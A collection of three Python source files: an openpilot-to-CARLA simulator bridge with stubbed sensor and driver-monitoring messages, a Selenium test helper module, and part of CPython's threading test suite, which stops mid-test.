#!/usr/bin/env python3
import os
import time
import math
import atexit
import numpy as np
import threading
import random
import cereal.messaging as messaging
import argparse
from common.params import Params
from common.realtime import Ratekeeper
from lib.can import can_function, sendcan_function
import queue
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--autopilot', action='store_true')
args = parser.parse_args()
pm = messaging.PubMaster(['frame', 'sensorEvents', 'can'])
W,H = 1164, 874
def cam_callback(image):
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0,1,2]].copy()
dat = messaging.new_message()
dat.init('frame')
dat.frame = {
"frameId": image.frame,
"image": img.tostring(),
}
pm.send('frame', dat)
def imu_callback(imu):
#print(imu, imu.accelerometer)
dat = messaging.new_message()
dat.init('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def health_function():
pm = messaging.PubMaster(['health'])
rk = Ratekeeper(1.0)
while 1:
dat = messaging.new_message()
dat.init('health')
dat.valid = True
dat.health = {
'ignitionLine': True,
'hwType': "whitePanda",
'controlsAllowed': True
}
pm.send('health', dat)
rk.keep_time()
def fake_driver_monitoring():
pm = messaging.PubMaster(['driverState'])
while 1:
dat = messaging.new_message()
dat.init('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
time.sleep(0.1)
def go():
import carla
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(5.0)
world = client.load_world('Town03')
settings = world.get_settings()
settings.fixed_delta_seconds = 0.05
world.apply_settings(settings)
weather = carla.WeatherParameters(
cloudyness=0.0,
precipitation=0.0,
precipitation_deposits=0.0,
wind_intensity=0.0,
sun_azimuth_angle=0.0,
sun_altitude_angle=0.0)
world.set_weather(weather)
blueprint_library = world.get_blueprint_library()
"""
for blueprint in blueprint_library.filter('sensor.*'):
print(blueprint.id)
exit(0)
"""
world_map = world.get_map()
vehicle_bp = random.choice(blueprint_library.filter('vehicle.bmw.*'))
vehicle = world.spawn_actor(vehicle_bp, random.choice(world_map.get_spawn_points()))
if args.autopilot:
vehicle.set_autopilot(True)
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '70')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.45))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(cam_callback)
# TODO: wait for carla 0.9.7
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(imu_callback)
def destroy():
print("clean exit")
imu.destroy()
camera.destroy()
vehicle.destroy()
print("done")
atexit.register(destroy)
# can loop
sendcan = messaging.sub_sock('sendcan')
rk = Ratekeeper(100)
steer_angle = 0
while 1:
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2)
can_function(pm, speed, steer_angle, rk.frame, rk.frame%500 == 499)
if rk.frame%5 == 0:
throttle, brake, steer = sendcan_function(sendcan)
steer_angle += steer/10000.0 # torque
vc = carla.VehicleControl(throttle=throttle, steer=steer_angle, brake=brake)
vehicle.apply_control(vc)
print(speed, steer_angle, vc)
rk.keep_time()
if __name__ == "__main__":
params = Params()
params.delete("Offroad_ConnectivityNeeded")
from selfdrive.version import terms_version, training_version
params.put("HasAcceptedTerms", terms_version)
params.put("CompletedTrainingVersion", training_version)
params.put("CommunityFeaturesToggle", "1")
threading.Thread(target=health_function).start()
threading.Thread(target=fake_driver_monitoring).start()
# no carla, still run
try:
import carla
except ImportError:
print("WARNING: NO CARLA")
while 1:
time.sleep(1)
go()
|
base.py
|
"""
Base functions for tests.
"""
import os
import socketserver
import threading
import unittest
from contextlib import contextmanager
from functools import wraps
from http.server import SimpleHTTPRequestHandler
from time import sleep
from selenium import webdriver
from aloe.testing import in_directory
def feature(fails=False):
"""
Decorate a test method to test the feature contained in its docstring.
For example:
@feature(failed=False)
def test_some_feature(self):
'''
When I ...
Then I ...
'''
The method code is ignored.
"""
def outer(func):
"""
A decorator to run the function as the feature contained in docstring.
"""
@wraps(func)
@in_directory(os.path.dirname(__file__))
def inner(self):
"""Run the scenario from docstring."""
scenario = func.__doc__
# Make it possible to reference SERVER_HOST in URLs inside
# scenarios
scenario = scenario.replace(
'SERVER_HOST',
os.environ.get('SERVER_HOST', '0.0.0.0')
)
feature_string = """
Feature: {name}
Scenario: {name}
{scenario_string}
""".format(name=func.__name__, scenario_string=scenario)
result = self.run_feature_string(feature_string)
if fails:
self.assertFalse(result.success)
else:
self.assertTrue(result.success)
return inner
return outer
class TestRequestHandler(SimpleHTTPRequestHandler):
"""A handler serving the test pages."""
def translate_path(self, path):
"""Serve the pages directory instead of the current directory."""
pages_dir = os.path.relpath(
os.path.join(os.path.dirname(__file__), 'html_pages'))
return SimpleHTTPRequestHandler.translate_path(
self, '/' + pages_dir + path)
def do_GET(self):
"""
Artificially slow down the response to make sure there are no race
conditions.
"""
sleep(0.5)
return SimpleHTTPRequestHandler.do_GET(self)
def log_message(self, *args, **kwargs): # pylint:disable=arguments-differ
"""Turn off logging."""
pass
class TestServer(socketserver.TCPServer):
"""Server for the test pages."""
allow_reuse_address = True
def get_request(self):
"""Set a timeout on the request socket."""
request, addr = socketserver.TCPServer.get_request(self)
request.settimeout(2) # pylint:disable=no-member
return request, addr
@contextmanager
def test_server():
"""A context manager starting a server for the test pages."""
port = 7755
server = TestServer(('', port), TestRequestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
# When running the browser in Docker, pass the host address
# to allow the container to access the server on the host
if 'SERVER_HOST' in os.environ:
address = (os.environ['SERVER_HOST'], port)
else:
address = server.server_address
yield server, address
server.shutdown()
server_thread.join()
server.server_close()
def browser_type():
"""Browser type selected for the tests."""
return os.environ.get('BROWSER_TYPE', 'firefox')
def skip_if_browser(browsers, message):
"""Decorator to skip a test with a particular browser type."""
if not isinstance(browsers, (list, tuple)):
browsers = [browsers]
if browser_type() in browsers:
return unittest.skip(message)
return lambda func: func
def create_browser():
"""Create a Selenium browser for tests."""
if 'SELENIUM_ADDRESS' in os.environ:
address = 'http://{}/wd/hub'.format(os.environ['SELENIUM_ADDRESS'])
capabilities = {
'chrome': webdriver.DesiredCapabilities.CHROME,
'firefox': webdriver.DesiredCapabilities.FIREFOX,
'phantomjs': webdriver.DesiredCapabilities.PHANTOMJS,
}
try:
browser = capabilities[browser_type()]
except KeyError:
raise ValueError("Invalid BROWSER_TYPE.")
return webdriver.Remote(
address,
desired_capabilities=browser,
)
browsers = {
'chrome': webdriver.Chrome,
'firefox': webdriver.Firefox,
'phantomjs': webdriver.PhantomJS,
}
driver = browsers[browser_type()]
# Explicitly specify the browser locale for the date input tests to work
# regardless of the user's settings
old_lc_all = os.environ.get('LC_ALL', '')
try:
os.environ['LC_ALL'] = 'en_US'
return driver()
finally:
os.environ['LC_ALL'] = old_lc_all
|
test_threading.py
|
"""
Tests for the threading module.
"""
import test.support
from test.support import threading_helper
from test.support import verbose, import_module, cpython_only
from test.support.script_helper import assert_python_ok, assert_python_failure
import random
import sys
import _thread
import threading
import time
import unittest
import weakref
import os
import subprocess
import signal
import textwrap
from test import lock_tests
from test import support
# Between fork() and exec(), only async-safe functions are allowed (issues
# #12316 and #11870), and fork() from a worker thread is known to trigger
# problems with some operating systems (issue #3863): skip problematic tests
# on platforms known to behave badly.
platforms_to_skip = ('netbsd5', 'hp-ux11')
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print('task %s will run for %.1f usec' %
(self.name, delay * 1e6))
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print(self.nrunning.get(), 'tasks are running')
self.testcase.assertLessEqual(self.nrunning.get(), 3)
time.sleep(delay)
if verbose:
print('task', self.name, 'done')
with self.mutex:
self.nrunning.dec()
self.testcase.assertGreaterEqual(self.nrunning.get(), 0)
if verbose:
print('%s is finished. %d tasks are running' %
(self.name, self.nrunning.get()))
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._threads = threading_helper.threading_setup()
def tearDown(self):
threading_helper.threading_cleanup(*self._threads)
test.support.reap_children()
class ThreadTests(BaseTestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
self.assertIsNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, initial\)>$')
t.start()
if hasattr(threading, 'get_native_id'):
native_ids = set(t.native_id for t in threads) | {threading.get_native_id()}
self.assertNotIn(None, native_ids)
self.assertEqual(len(native_ids), NUMTASKS + 1)
if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with threading_helper.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
